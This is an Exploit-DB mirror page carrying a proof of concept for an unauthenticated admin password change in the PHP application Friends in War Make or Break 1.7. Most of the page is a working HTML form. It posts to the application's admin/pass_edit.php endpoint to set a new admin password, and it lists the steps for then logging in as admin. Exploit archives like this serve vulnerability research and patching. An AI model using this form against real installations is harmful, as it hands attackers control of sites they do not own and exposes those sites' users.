bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/42383.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
737 B
HTML
Raw Blame History

Friends in War Make or Break 1.7 - Unauthenticated admin password change
Url: http://software.friendsinwar.com/
http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
<input type="text" name="password" value="ChangeMe">
<input type="text" name="submit" value="Edit+Password" hidden=true>
<input type="submit" value="Submit">
</form>
Reference in a new issue View git blame Copy permalink